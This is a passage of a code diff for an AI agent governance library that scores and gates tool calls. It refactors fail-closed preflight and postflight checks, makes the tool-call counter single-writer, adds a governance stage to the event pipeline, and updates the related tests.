+        Returns (trace, verdict) tuple. Verdict is ALLOW or DENY.
+        Session ID is derived from the trace (which normalizes from payload).
+        """
+        with self._lock:
+            trace = self._scorer(payload)
+        # Use trace.session_id for consistency — it normalizes empty/missing values
+        session_id = trace.session_id
+        verdict = self.run_preflight(trace, session_id=session_id)
+        return trace, verdict
+
+    def enforce_postflight(
+        self,
+        trace: "EventTrace",
+        *,
+        session_id: str,
+        output: dict | None = None,
+        duration_ms: int | None = None,
+        error: str | None = None,
+    ) -> "PostflightVerdict":
+        """Observe the completed call, then run the postflight chain.
+
+        This is the post-execution point: the call the shield allowed has now
+        run, so the trace observes it here — the single place the tool-call
+        counter advances in the gate channel. Then callers check verdict.action:
+          - ACCEPT: return result normally
+          - REDACT: strip keys from output before returning
+          - SUPPRESS: return empty/neutral output to the model
+          - TERMINATE: raise/signal session termination
+          - ALERT: return result normally but log alert
+        """
+        self._observe_completed_call(trace, session_id=session_id)
+        return self.run_postflight(
+            trace,
+            session_id=session_id,
+            output=output,
+            duration_ms=duration_ms,
+            error=error,
+        )
+
+    # ── Preflight / postflight chains ──────────────────────────────────────────
+
+    def run_preflight(self, trace: "EventTrace", *, session_id: str) -> "Verdict":
+        """Execute the preflight gate chain. Returns first DENY or ALLOW.
+
+        All gates come from the GatePolicy. No per-method overrides.
+        Fail-closed: if any gate or internal logic raises, returns DENY.
+        """
+        from tracemill.sdk.verdict import Verdict
+
+        try:
+            request = self._to_tool_call_request(trace)
+            ctx = self._build_gate_context(session_id)
+        except Exception as exc:
+            deny = Verdict.deny(f"gate setup error (fail-closed): {type(exc).__name__}: {exc}")
+            self._record_denial(session_id, deny)
+            return deny
+
+        # Run policy chain
+        policy = self._policy_provider()
+        if policy and policy.has_preflight:
+            for gate in policy.preflight_gates:
+                try:
+                    verdict = gate(request, ctx)
+                except Exception as exc:
+                    # Fail-closed: gate exception = DENY
+                    deny = Verdict.deny(f"gate error (fail-closed): {type(exc).__name__}: {exc}")
+                    self._record_denial(session_id, deny)
+                    return deny
+                if verdict.denied:
+                    self._record_denial(session_id, verdict)
+                    return verdict
+
+        self._record_allow(session_id, tool_call_id=trace.tool_call_id)
+        return Verdict.allow()
+
+    def run_postflight(
+        self,
+        trace: "EventTrace",
+        *,
+        session_id: str,
+        output: dict | None = None,
+        duration_ms: int | None = None,
+        error: str | None = None,
+    ) -> "PostflightVerdict":
+        """Execute the postflight gate chain. Returns most restrictive action.
+
+        Priority: TERMINATE > SUPPRESS > REDACT > ALERT > ACCEPT.
+        Fail-closed: if any gate or setup raises, returns SUPPRESS.
+        """
+        from tracemill.sdk.gate_types import PostflightAction, PostflightVerdict
+
+        try:
+            result = self._to_tool_call_result(
+                trace, output=output, duration_ms=duration_ms, error=error
+            )
+            ctx = self._build_gate_context(session_id)
+        except Exception as exc:
+            return PostflightVerdict(
+                action=PostflightAction.SUPPRESS,
+                reason=f"postflight setup error (fail-closed): {type(exc).__name__}: {exc}",
+            )
+
+        # Action severity ordering
+        _SEVERITY = {
+            PostflightAction.ACCEPT: 0,
+            PostflightAction.ALERT: 1,
+            PostflightAction.REDACT: 2,
+            PostflightAction.SUPPRESS: 3,
+            PostflightAction.TERMINATE: 4,
+        }
+
+        most_severe = PostflightVerdict()
+
+        # Run policy chain
+        policy = self._policy_provider()
+        if policy and policy.has_postflight:
+            for gate in policy.postflight_gates:
+                try:
+                    pv = gate(result, ctx)
+                except Exception as exc:
+                    # Fail-closed: gate exception = SUPPRESS (not TERMINATE to avoid crashing)
+                    pv = PostflightVerdict(
+                        action=PostflightAction.SUPPRESS,
+                        reason=f"postflight gate error (fail-closed): {type(exc).__name__}: {exc}",
+                    )
+                if _SEVERITY.get(pv.action, 0) > _SEVERITY.get(most_severe.action, 0):
+                    most_severe = pv
+
+        return most_severe
+
+    @staticmethod
+    def apply_postflight_to_output(pv: "PostflightVerdict", result: str) -> str:
+        """Apply a postflight verdict to a string result.
+
+        Returns the (possibly redacted/suppressed) output string.
+        Raises RuntimeError on TERMINATE.
+        """
+        from tracemill.sdk.gate_types import PostflightAction
+
+        if pv.action == PostflightAction.ACCEPT or pv.action == PostflightAction.ALERT:
+            return result
+        if pv.action == PostflightAction.SUPPRESS:
+            return "[output suppressed by policy]"
+        if pv.action == PostflightAction.REDACT:
+            redacted = result
+            for key in pv.redaction_keys:
+                redacted = redacted.replace(key, "[REDACTED]")
+            return redacted
+        if pv.action == PostflightAction.TERMINATE:
+            raise RuntimeError(f"Session terminated by policy: {pv.reason}")
+        return result
+
+    # ── Gate state + counter (single writer for the gate channel) ──────────────
+
+    def _observe_completed_call(self, trace: "EventTrace", *, session_id: str) -> None:
+        """Advance the single tool-call counter for a shield-allowed call that
+        has now executed. The trace only ever observes what the gate allowed, so
+        this is the one writer of the counter in the gate channel."""
+        state = self._ensure_gate_state(session_id)
+        phase_window = state.snapshot().phase_window
+        state.increment_budget(
+            mechanism=trace.mechanism,
+            effect=trace.effect,
+            scope=frozenset(trace.scope),
+            role=frozenset(trace.role),
+            action=frozenset(trace.action),
+            capability=frozenset(trace.capability),
+            structure=frozenset(trace.structure),
+            phase=phase_window[-1] if phase_window else None,
+        )
+
+    def _record_denial(self, session_id: str, verdict: "Verdict") -> None:
+        """Record a shield denial. Does not touch the tool-call counter."""
+        self._ensure_gate_state(session_id).record_denial(verdict)
+
+    def _record_allow(self, session_id: str, *, tool_call_id: str | None = None) -> None:
+        """Record a shield allow. The tool-call counter is NOT advanced here —
+        it advances only when the allowed call is observed at completion
+        (see _observe_completed_call). The shield only reads the counter."""
+        self._ensure_gate_state(session_id).record_allow(tool_call_id=tool_call_id)
+
+    def _ensure_gate_state(self, session_id: str):
+        """Return session state for gate context tracking (thread-safe, ephemeral)."""
+        return self._registry.ensure(session_id)
+
+    def _build_gate_context(self, session_id: str) -> "GateContext":
+        """Build a GateContext from current session state.
+
+        Reads only — the counter and decision log are owned by SessionState and
+        exposed through methods. The shield never mutates state from here.
+        """
+        from tracemill.sdk.gate_types import GateContext
+
+        state = self._registry.get(session_id)
+        if state is None:
+            return GateContext(session_id=session_id, tool_call_count=0, denied_count=0)
+
+        return GateContext(
+            session_id=session_id,
+            tool_call_count=state.tool_call_count,
+            denied_count=state.denied_count,
+            prior_verdicts=state.prior_verdicts(),
+            prior_tool_call_ids=state.prior_tool_call_ids(),
+        )
+
+    def _to_tool_call_request(self, trace: "EventTrace") -> "ToolCallRequest":
+        """Convert a fully-assessed EventTrace into a gate-facing ToolCallRequest."""
+        from tracemill.sdk.gate_types import ToolCallRequest
+
+        return ToolCallRequest(
+            tool=trace.canonical_tool or trace.tool_name or "unknown",
+            input=trace.tool_input,
+            target=trace.target_resource,
+            mechanism=trace.mechanism or "unknown",
+            effect=trace.effect or "read_only",
+            capabilities=trace.capability,
+            scope=trace.scope,
+            role=trace.role,
+            action=trace.action,
+            risk_score=trace.risk_score or 0,
+            risk_band=trace.risk_band or "unknown",
+            suggested_action=trace.suggested_action or "allow",
+            reason=trace.reason or "",
+            session_id=trace.session_id,
+            tool_call_id=trace.tool_call_id,
+            event_trace=trace,
+        )
+
+    def _to_tool_call_result(
+        self,
+        trace: "EventTrace",
+        *,
+        output: dict | None = None,
+        duration_ms: int | None = None,
+        error: str | None = None,
+    ) -> "ToolCallResult":
+        """Convert a fully-assessed EventTrace + output into a gate-facing ToolCallResult."""
+        from tracemill.sdk.gate_types import ToolCallResult
+        from tracemill.trace import _deep_freeze, EMPTY_MAP
+
+        return ToolCallResult(
+            tool=trace.canonical_tool or trace.tool_name or "unknown",
+            input=trace.tool_input,
+            target=trace.target_resource,
+            output=_deep_freeze(output) if output else EMPTY_MAP,
+            duration_ms=duration_ms,
+            error=error,
+            mechanism=trace.mechanism or "unknown",
+            effect=trace.effect or "read_only",
+            capabilities=trace.capability,
+            risk_score=trace.risk_score or 0,
+            risk_band=trace.risk_band or "unknown",
+            suggested_action=trace.suggested_action or "allow",
+            reason=trace.reason or "",
+            session_id=trace.session_id,
+            tool_call_id=trace.tool_call_id,
+            event_trace=trace,
+        )

--- a/src/tracemill/governance/state.py
+++ b/src/tracemill/governance/state.py
@@ -90,8 +90,8 @@ class SessionState:
     _last_sequence: int | None = None
     _gap_ordinal: int = 0
     _db: sqlite3.Connection | None = None
-    # Gate tracking fields
-    _tool_call_count: int = 0
+    # Shield (enforcement) decision log. The tool-call counter itself is NOT
+    # here — it is _total_tool_calls above, advanced only by increment_budget.
     _denied_count: int = 0
     _prior_verdicts: deque = field(default_factory=lambda: deque(maxlen=100))
     _prior_tool_call_ids: deque = field(default_factory=lambda: deque(maxlen=100))
@@ -175,6 +175,40 @@ class SessionState:
 
     def set_last_user(self, event_id: str) -> None:
         self._last_user_event_id = event_id
+
+    # ─── Enforcement (shield) decision tracking ──────────────────────────────
+    # The tool-call counter is single-writer: it advances ONLY through
+    # increment_budget() when a call is observed. The shield READS
+    # tool_call_count and owns only its own denial/allow decision log below.
+
+    @property
+    def tool_call_count(self) -> int:
+        """Tool calls observed this session — the single source of truth."""
+        return self._total_tool_calls
+
+    @property
+    def denied_count(self) -> int:
+        """Tool calls the shield has denied this session."""
+        return self._denied_count
+
+    def prior_verdicts(self) -> tuple:
+        """Recent enforcement verdicts (most-recent-last, bounded)."""
+        return tuple(self._prior_verdicts)
+
+    def prior_tool_call_ids(self) -> tuple[str, ...]:
+        """Recent allowed tool-call ids (most-recent-last, bounded)."""
+        return tuple(self._prior_tool_call_ids)
+
+    def record_denial(self, verdict) -> None:
+        """Record a shield denial. Does NOT touch the tool-call counter."""
+        self._denied_count += 1
+        self._prior_verdicts.append(verdict)  # deque(maxlen=100) auto-evicts
+
+    def record_allow(self, tool_call_id: str | None = None) -> None:
+        """Record a shield allow. Logs the id only — the counter advances via
+        observation (increment_budget), never here."""
+        if tool_call_id:
+            self._prior_tool_call_ids.append(tool_call_id)  # deque(maxlen=100)
 
     def check_pressure(self, thresholds: dict | None) -> bool:
         """Check if any threshold is exceeded. Updates pressure flag."""

--- a/src/tracemill/pipeline.py
+++ b/src/tracemill/pipeline.py
@@ -9,7 +9,7 @@ from collections.abc import Awaitable, Iterable
 
 from tracemill.enricher import Enricher
 from tracemill.sinks.base import StorageSink
-from tracemill.types import SessionEvent, TelemetrySpan, TitleUpdate, UsageRecord
+from tracemill.types import EventMetadata, SessionEvent, TelemetrySpan, TitleUpdate, UsageRecord
 
 logger = logging.getLogger(__name__)
 
@@ -77,9 +77,17 @@ class EventPipeline:
         enable_boundary: bool = True,
         enable_title: bool = False,
         max_sessions: int | None = _DEFAULT_MAX_SESSIONS,
+        governance=None,
     ) -> None:
         self._sinks = list(sinks)
         self._enricher = enricher
+        # Optional governance stage: any object exposing
+        # ``observe_event(event) -> SessionMeta | None``. When supplied, each event
+        # is scored and its SessionMeta stamped onto ``metadata.governance`` at the
+        # single sink choke point, so governance is one stage of the pipeline
+        # rather than a separate track. ``None`` (default) = pure observation, no
+        # governance, existing behaviour unchanged.
+        self._governance = governance
 
         if phase_inferencer is None and enable_phase:
             from tracemill.phase import PhaseInferencer
@@ -598,8 +606,44 @@ class EventPipeline:
         await self._fanout((sink.flush() for sink in self._sinks), "flush")
 
     async def _push_to_sinks(self, event: SessionEvent) -> None:
-        """Push event directly to sinks (bypassing enricher)."""
+        """Push event to sinks, stamping governance first if a stage is wired in.
+
+        Governance is the pipeline's final enrichment stage: it runs after the
+        live phase/boundary/title structuring, so the SessionMeta it produces is
+        attached to the fully-structured event, then the event fans out to every
+        sink. Every event passes through here (the single sink choke point), so
+        this is where governance belongs as one stage of the pipeline.
+        """
+        if self._governance is not None:
+            event = self._annotate_governance(event)
         await self._fanout((sink.on_event(event) for sink in self._sinks), f"event {event.id}")
+
+    def _annotate_governance(self, event: SessionEvent) -> SessionEvent:
+        """Score one event through the governance stage and stamp its SessionMeta.
+
+        Returns a copy of the event with ``metadata.governance`` populated. The
+        stage is error-isolated: on any governance failure the original event is
+        emitted unchanged (logged), so the observation stream is never blocked by
+        the governance stage.
+        """
+        try:
+            meta = self._governance.observe_event(event)
+        except Exception as exc:
+            logger.error(
+                "Governance stage failed on event %s: %s -- emitting ungoverned",
+                event.id,
+                exc,
+                exc_info=True,
+            )
+            return event
+        if meta is None:
+            return event
+        metadata = event.metadata
+        if metadata is None:
+            metadata = EventMetadata.model_construct(governance=meta)
+        else:
+            metadata = metadata.model_copy(update={"governance": meta})
+        return event.model_copy(update={"metadata": metadata})
 
     async def close(self) -> None:
         """Flush then close all sinks. Error-isolated."""

--- a/src/tracemill/sdk/__init__.py
+++ b/src/tracemill/sdk/__init__.py
@@ -21,7 +21,6 @@ native blocking mechanism. The postflight callback receives the tool output for 
 
 from __future__ import annotations
 
-from tracemill.governance.pipeline import GovernancePipeline as Pipeline  # noqa: E402
 from tracemill.sdk.gate_policy import GatePolicy  # noqa: E402
 from tracemill.sdk.gate_types import (  # noqa: E402
     GateContext,
@@ -37,6 +36,11 @@ from tracemill.sdk.verdict import (  # noqa: E402
     Verdict,
 )
 from tracemill.trace import EventTrace, TraceStage  # noqa: E402
+
+# Imported last so every SDK submodule symbol above is already defined before the
+# facade (which pulls in the governance engine + core EventPipeline) resolves,
+# keeping this package free of import-cycle ordering hazards.
+from tracemill.sdk.pipeline import Pipeline  # noqa: E402
 
 __all__ = [
     "Pipeline",

--- a/src/tracemill/sdk/pipeline.py
+++ b/src/tracemill/sdk/pipeline.py
@@ -1,0 +1,242 @@
+"""The tracemill Pipeline: observe -> enrich -> classify -> structure -> [govern] -> sinks.
+
+This is the SDK's top-level entry point. It composes tracemill's two halves into one
+object:
+
+* the **observation backbone** (:class:`~tracemill.pipeline.EventPipeline`), which
+  enriches, classifies, and ML-structures (phase / boundary / title) every event before
+  fanning it out to sinks, and
+* the **governance engine** (:class:`~tracemill.governance.pipeline.GovernancePipeline`),
+  which scores risk, tracks budgets / drift, and backs the opt-in gating layer.
+
+Governance is wired in as **one stage** of the backbone: when enabled, each event is
+scored and its :class:`~tracemill.governance.results.SessionMeta` stamped onto
+``event.metadata.governance`` just before the sinks see it. It is not a separate pipeline
+and not a precondition -- structuring runs with or without it.
+
+Gating is a separate, opt-in enforcement layer. The ``gate_*`` helpers install a
+:class:`~tracemill.sdk.GatePolicy` into your agent framework using that framework's native
+blocking mechanism; the policy's preflight callback returns a
+:class:`~tracemill.sdk.Verdict` (ALLOW / DENY). Observation itself never issues verdicts --
+only the gating layer does, and only when you opt in.
+
+Usage -- gating a live agent::
+
+    from tracemill.sdk import Pipeline, GatePolicy, Verdict, ToolCallRequest, GateContext
+
+    def preflight(request: ToolCallRequest, ctx: GateContext) -> Verdict:
+        if request.risk_score > 60:
+            return Verdict.deny(f"score {request.risk_score} exceeds threshold")
+        return Verdict.allow()
+
+    pipeline = Pipeline.create(policy=GatePolicy().preflight(preflight))
+    tool = pipeline.gate_langchain(tool)   # wrap a LangChain tool
+    pipeline.gate_crewai()                 # install CrewAI hooks
+
+Usage -- observing an event stream::
+
+    from tracemill.sdk import Pipeline
+    from tracemill.sinks.jsonl import JsonlSink
+
+    async with Pipeline.create(sinks=[JsonlSink("events.jsonl")]) as pipeline:
+        async for event in adapter.stream(...):
+            await pipeline.push(event)     # enriched, structured, governed, emitted
+"""
+
+from __future__ import annotations
+
+from typing import TYPE_CHECKING
+
+from tracemill.enricher import Enricher
+from tracemill.governance.pipeline import GovernancePipeline
+from tracemill.pipeline import EventPipeline
+
+if TYPE_CHECKING:
+    from tracemill.config.models import GovernanceConfig
+    from tracemill.sdk.gate_policy import GatePolicy
+    from tracemill.sinks.base import StorageSink
+    from tracemill.trace import EventTrace
+    from tracemill.types import SessionEvent, TelemetrySpan, UsageRecord
+
+
+class Pipeline:
+    """Observe -> structure backbone with governance as one stage and opt-in gating.
+
+    Construct via :meth:`create` or :meth:`from_config`; do not instantiate directly.
+    """
+
+    def __init__(self, *, backbone: EventPipeline, governance: GovernancePipeline) -> None:
+        self._backbone = backbone
+        self._governance = governance
+
+    # ---- construction -------------------------------------------------------
+
+    @classmethod
+    def create(
+        cls,
+        config: "GovernanceConfig | None" = None,
+        *,
+        policy: "GatePolicy | None" = None,
+        sinks: "list[StorageSink] | None" = None,
+        enable_structure: bool = True,
+        enable_title: bool = False,
+        enricher: "Enricher | None" = None,
+        governance: bool = True,
+    ) -> "Pipeline":
+        """Build a pipeline from config.
+
+        Args:
+            config: GovernanceConfig for the governance engine (in-memory DB and
+                sensible defaults when omitted).
+            policy: Optional GatePolicy enabling the gating layer (the ``gate_*``
+                helpers). Omit for observation-only usage.
+            sinks: Observation destinations for pushed events. Omit for gating-only
+                usage (you never call :meth:`push`).
+            enable_structure: Run phase + boundary ML structuring on pushed events
+                (default True). Models load lazily on first push, so gating-only
+                usage pays nothing.
+            enable_title: Also run session-title inference (default False).
+            enricher: Custom :class:`~tracemill.enricher.Enricher`; defaults to a
+                zero-config ``Enricher()``.
+            governance: Wire the governance engine in as a pipeline stage so pushed
+                events get ``metadata.governance`` stamped (default True). Set False
+                for pure observation; ``gate_*`` / :meth:`score_tool_call` still use
+                the engine.
+        """
+        gov_engine = GovernancePipeline.create(config, policy=policy)
+        return cls._assemble(
+            gov_engine,
+            sinks=sinks,
+            enable_structure=enable_structure,
+            enable_title=enable_title,
+            enricher=enricher,
+            governance=governance,
+        )
+
+    @classmethod
+    def from_config(
+        cls,
+        path=None,
+        *,
+        policy: "GatePolicy | None" = None,
+        sinks: "list[StorageSink] | None" = None,
+        enable_structure: bool = True,
+        enable_title: bool = False,
+        enricher: "Enricher | None" = None,
+        governance: bool = True,
+    ) -> "Pipeline":
+        """Build a pipeline from a ``tracemill.yaml`` file.
+
+        Same knobs as :meth:`create`, but the governance engine is loaded from the
+        given config file (see :meth:`GovernancePipeline.from_config`).
+        """
+        gov_engine = GovernancePipeline.from_config(path, policy=policy)
+        return cls._assemble(
+            gov_engine,
+            sinks=sinks,
+            enable_structure=enable_structure,
+            enable_title=enable_title,
+            enricher=enricher,
+            governance=governance,
+        )
+
+    @classmethod
+    def _assemble(
+        cls,
+        gov_engine: GovernancePipeline,
+        *,
+        sinks,
+        enable_structure,
+        enable_title,
+        enricher,
+        governance,
+    ) -> "Pipeline":
+        backbone = EventPipeline(
+            sinks=list(sinks) if sinks is not None else [],
+            enricher=enricher if enricher is not None else Enricher(),
+            enable_phase=enable_structure,
+            enable_boundary=enable_structure,
+            enable_title=enable_title,
+            governance=gov_engine if governance else None,
+        )
+        return cls(backbone=backbone, governance=gov_engine)
+
+    # ---- observation backbone ----------------------------------------------
+
+    async def push(self, event: "SessionEvent") -> None:
+        """Enrich, classify, structure, govern, and emit a single event."""
+        await self._backbone.push(event)
+
+    async def push_span(self, span: "TelemetrySpan") -> None:
+        """Emit a telemetry span to the sinks."""
+        await self._backbone.push_span(span)
+
+    async def push_usage(self, usage: "UsageRecord") -> None:
+        """Emit a usage record to the sinks."""
+        await self._backbone.push_usage(usage)
+
+    async def flush(self) -> None:
+        """Flush held plumbing and pending refinements, then flush all sinks."""
+        await self._backbone.flush()
+
+    async def close(self) -> None:
+        """Flush, then close all sinks."""
+        await self._backbone.close()
+
+    async def __aenter__(self) -> "Pipeline":
+        return self
+
+    async def __aexit__(self, *exc) -> None:
+        await self.close()
+
+    # ---- preflight scoring (governance stage, read-only) -------------------
+
+    def score_tool_call(self, payload: dict) -> "EventTrace":
+        """Score a prospective tool call (dict) without mutating session state."""
+        return self._governance.score_tool_call(payload)
+
+    # ---- gating layer (opt-in; delegates to the governance engine) ---------
+
+    def gate_crewai(self) -> None:
+        """Install CrewAI gating hooks."""
+        return self._governance.gate_crewai()
+
+    def gate_langchain(self, tool):
+        """Wrap a LangChain tool so calls are gated. Returns the wrapped tool."""
+        return self._governance.gate_langchain(tool)
+
+    def gate_langgraph(self, tools):
+        """Wrap LangGraph tools. Returns a gated tool node."""
+        return self._governance.gate_langgraph(tools)
+
+    def gate_semantic_kernel(self, kernel) -> None:
+        """Install a Semantic Kernel gating filter."""
+        return self._governance.gate_semantic_kernel(kernel)
+
+    def gate_maf(self):
+        """Return Microsoft Agent Framework gating middleware."""
+        return self._governance.gate_maf()
+
+    def gate_smolagents(self, agent_cls=None):
+        """Gate smolagents. Returns a gated agent class."""
+        return self._governance.gate_smolagents(agent_cls)
+
+    def gate_pydantic_ai(self, agent) -> None:
+        """Install Pydantic AI gating."""
+        return self._governance.gate_pydantic_ai(agent)
+
+    def gate_openai_agents(self, agent):
+        """Gate an OpenAI Agents SDK agent."""
+        return self._governance.gate_openai_agents(agent)
+
+    # ---- escape hatches ----------------------------------------------------
+
+    @property
+    def governance(self) -> GovernancePipeline:
+        """The underlying governance engine (scoring, budgets, gating internals)."""
+        return self._governance
+
+    @property
+    def backbone(self) -> EventPipeline:
+        """The underlying observation / structuring EventPipeline."""
+        return self._backbone

--- a/tests/e2e/test_framework_gating_e2e.py
+++ b/tests/e2e/test_framework_gating_e2e.py
@@ -574,7 +574,8 @@ class TestGatePolicyIntegration:
         assert "Destructive tool blocked" in verdict.reason
 
     def test_session_state_accumulates(self):
-        """Gate context tracks tool_call_count across calls."""
+        """tool_call_count is single-writer: it advances when a call is observed
+        (post-execution), not at preflight. The shield reads it to rate-limit."""
         pipeline = make_pipeline(preflight=deny_after_3_calls)
 
         for i in range(3):
@@ -587,6 +588,8 @@ class TestGatePolicyIntegration:
             )
             verdict = pipeline._run_preflight(trace, session_id="rate-test")
             assert verdict.allowed, f"Call {i} should be allowed"
+            # Completion observes the allowed call; this is where the count advances.
+            pipeline._enforce_postflight(trace, session_id="rate-test", output={"r": "ok"})
 
         # 4th call should be denied
         trace = pipeline.score_tool_call(
@@ -646,7 +649,7 @@ class TestGatePolicyIntegration:
         """Different session_ids maintain separate state."""
         pipeline = make_pipeline(preflight=deny_after_3_calls)
 
-        # Session A: 3 calls
+        # Session A: 3 calls (each observed at completion, which advances count)
         for i in range(3):
             trace = pipeline.score_tool_call(
                 {
@@ -655,7 +658,8 @@ class TestGatePolicyIntegration:
                     "session_id": "session-A",
                 }
             )
-            pipeline._run_preflight(trace, session_id="session-A")
+            assert pipeline._run_preflight(trace, session_id="session-A").allowed
+            pipeline._enforce_postflight(trace, session_id="session-A", output={"r": "ok"})
 
         # Session A: 4th call denied
         trace = pipeline.score_tool_call(

--- a/tests/unit/test_bridge.py
+++ b/tests/unit/test_bridge.py
@@ -12,7 +12,8 @@ from tracemill.classify.core import Classification, Mechanism
 from tracemill.governance.budget import BudgetTracker
 from tracemill.governance.labeler import GovernanceLabeler
 from tracemill.governance.persistence import SystemStore
-from tracemill.governance.pipeline import GovernancePipeline, RecommendedAction, SessionMeta
+from tracemill.governance.pipeline import GovernancePipeline, SessionMeta
+from tracemill.governance.results import RecommendedAction
 from tracemill.governance.rules import parse_rules
 from tracemill.types import EventKind, EventMetadata, SessionEvent
 
@@ -230,17 +231,18 @@ class TestAssessEvent:
     def test_fail_closed_on_broken_event(self, pipeline):
         """If classification somehow raises, we get ESCALATE."""
         event = _make_event(tool_name="bash", arguments={"command": "ls"})
-        # Monkey-patch to force an exception in the bridge
-        orig = pipeline.context_from_session_event
+        # Monkey-patch to force an exception in the bridge (the ContextBuilder seam
+        # the Scorer actually calls — patched on the shared instance).
+        orig = pipeline._context.from_session_event
 
         def _boom(e):
             raise RuntimeError("synthetic failure")
 
-        pipeline.context_from_session_event = _boom
+        pipeline._context.from_session_event = _boom
         result = pipeline.score_tool_call_event(event)
         assert result.recommendation.recommended_action == RecommendedAction.ESCALATE
         assert "RuntimeError" in result.recommendation.reason_code
-        pipeline.context_from_session_event = orig
+        pipeline._context.from_session_event = orig
 
     def test_read_only_no_state_mutation(self, pipeline):
         cls = Classification(mechanism=CodingMechanism.PROCESS_SHELL, effect=None)

--- a/tests/unit/test_bridge.py
+++ b/tests/unit/test_bridge.py
@@ -317,3 +317,55 @@ class TestBridgeFieldMapping:
         event = _make_event(tool_name="bash", arguments={"command": "ls"})
         ctx = pipeline.context_from_session_event(event)
         assert ctx.project_root == pipeline._project_root
+
+
+# ═══════════════════════════════════════════════════════════════════════════════
+# Scoring a SessionEvent must not suppress a later observation of the same event
+# ═══════════════════════════════════════════════════════════════════════════════
+
+
+class TestScoreDoesNotSuppressObservation:
+    """Regression: the SessionEvent scoring path must namespace its audit key.
+
+    ``score_tool_call_event`` used to persist its audit row under the raw
+    ``event.id`` — unlike the dict path, which mints a ``score:``-prefixed key in
+    ``ToolCallEvent.from_dict``. Because ``process_event``'s idempotency guard
+    (``is_duplicate``) matches on ``source_event_key`` with no ``scored`` filter,
+    that collision let a prior score short-circuit observation, so the single
+    writer never advanced session state for the observed event. ``_persist_score``
+    now enforces the ``score:`` namespace for both intake channels.
+    """
+
+    def _keys(self, store, session_id):
+        return [
+            r[0]
+            for r in store._conn.execute(
+                "SELECT source_event_key FROM processed_events WHERE session_id = ?",
+                (session_id,),
+            ).fetchall()
+        ]
+
+    def test_scored_session_event_does_not_suppress_observation(self, pipeline, store):
+        event = _make_event(
+            tool_name="bash",
+            arguments={"command": "ls"},
+            kind=EventKind.TOOL_CALL_COMPLETED,
+            session_id="score-then-observe",
+        )
+
+        # Read side: preflight-score the SessionEvent. The audit row is
+        # score:-namespaced, never stored under the raw event id.
+        pipeline.score_tool_call_event(event)
+        assert self._keys(store, "score-then-observe") == [f"score:{event.id}"]
+        assert event.id not in self._keys(store, "score-then-observe")
+
+        # Write side: observing the SAME event must not be swallowed as a
+        # duplicate — the single writer advances Phase-1 state exactly once.
+        pipeline.observe_event(event)
+        assert pipeline.get_or_create_state("score-then-observe").tool_call_count == 1
+
+        # Both records coexist: the score: audit row and the raw-id observation row.
+        assert set(self._keys(store, "score-then-observe")) == {
+            f"score:{event.id}",
+            event.id,
+        }

--- a/tests/unit/test_enricher.py
+++ b/tests/unit/test_enricher.py
@@ -639,6 +639,63 @@ class TestIDStabilityAndRobustness:
         assert isinstance(result, list)
         assert result[0].id == original_id
 
+    def test_cross_session_id_collision_does_not_cross_pair(self):
+        """Two sessions reusing the same tool_call_id must not cross-pair.
+
+        A single Enricher instance processes interleaved sessions (the core
+        EventPipeline uses one Enricher for every session). Pending starts must
+        be keyed by (session_id, tool_call_id) so a completion only pairs with a
+        start from its OWN session. Otherwise session 2's start displaces
+        session 1's buffered start (emitting it as a bogus orphan) and session
+        1's completion mis-pairs with session 2's start — scoring one real call
+        twice and corrupting duration/attribution downstream.
+        """
+        enricher = Enricher()
+        t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
+        s1_start = _make_tool_start(tool_call_id="same", session_id="s1", ts=t0)
+        s2_start = _make_tool_start(
+            tool_call_id="same", session_id="s2", ts=t0 + timedelta(seconds=1)
+        )
+        s1_complete = _make_tool_complete(
+            tool_call_id="same", session_id="s1", ts=t0 + timedelta(seconds=2)
+        )
+        s2_complete = _make_tool_complete(
+            tool_call_id="same", session_id="s2", ts=t0 + timedelta(seconds=3)
+        )
+
+        # Both starts buffer independently — neither displaces the other.
+        assert enricher.process(s1_start) is None
+        assert enricher.process(s2_start) is None
+
+        # Each completion pairs with its own session's start (one event, no orphan list).
+        r1 = enricher.process(s1_complete)
+        assert not isinstance(r1, list)
+        assert r1 is not None
+        assert r1.session_id == "s1"
+        assert r1.metadata.duration_ms == 2000.0  # 12:00:00 -> 12:00:02
+
+        r2 = enricher.process(s2_complete)
+        assert not isinstance(r2, list)
+        assert r2 is not None
+        assert r2.session_id == "s2"
+        assert r2.metadata.duration_ms == 2000.0  # 12:00:01 -> 12:00:03
+
+    def test_flush_session_scoped_to_one_session_on_id_collision(self):
+        """_flush_session drains only the ended session's buffered start even when
+        another live session holds the same tool_call_id."""
+        enricher = Enricher()
+        enricher.process(_make_tool_start(tool_call_id="same", session_id="s1"))
+        enricher.process(_make_tool_start(tool_call_id="same", session_id="s2"))
+
+        orphans = enricher._flush_session("s1")
+        assert [o.session_id for o in orphans] == ["s1"]
+
+        # s2's start survives and still pairs.
+        paired = enricher.process(_make_tool_complete(tool_call_id="same", session_id="s2"))
+        assert not isinstance(paired, list)
+        assert paired is not None
+        assert paired.session_id == "s2"
+
     def test_flushed_orphan_preserves_original_id(self):
         """Flushed orphan start preserves its original event ID."""
         enricher = Enricher()

--- a/tests/unit/test_gating.py
+++ b/tests/unit/test_gating.py
@@ -320,7 +320,9 @@ class TestGateContextTracking:
 
         assert calls == [0, 1, 2]
 
-    def test_tool_call_count_increments_on_allow(self):
+    def test_tool_call_count_advances_on_observed_completion(self):
+        """Single-writer counter: it advances only when a call is observed at
+        completion (post-execution), never at preflight. The shield reads it."""
         calls = []
 
         def counting_gate(req, ctx):
@@ -331,7 +333,10 @@ class TestGateContextTracking:
 
         for _ in range(3):
             payload = {"tool_name": "x", "tool_input": {}, "session_id": "s1"}
-            pipeline._score_and_gate_preflight(payload)
+            trace, verdict = pipeline._score_and_gate_preflight(payload)
+            assert verdict.allowed
+            # Completion is where the trace observes the allowed call and counts it.
+            pipeline._enforce_postflight(trace, session_id=trace.session_id, output={"r": "ok"})
 
         assert calls == [0, 1, 2]
 

--- a/tests/unit/test_governance_new_modules.py
+++ b/tests/unit/test_governance_new_modules.py
@@ -13,7 +13,8 @@ from tracemill.governance.mcp_drift import (
 )
 from tracemill.governance.drift import DriftAssessment, DriftDetector, _TRANSITION_BONUSES
 from tracemill.governance.observer import TracemillObserver
-from tracemill.governance.pipeline import SessionMeta, EscalationContext, TransformSuggestion
+from tracemill.governance.pipeline import SessionMeta
+from tracemill.governance.results import EscalationContext, TransformSuggestion
 
 
 # ─── ContextGapEvent Tests ───

--- a/tests/unit/test_governance_new_modules.py
+++ b/tests/unit/test_governance_new_modules.py
@@ -449,7 +449,7 @@ class TestTransformSuggestion:
 
 class TestEscalationContext:
     def test_creation(self):
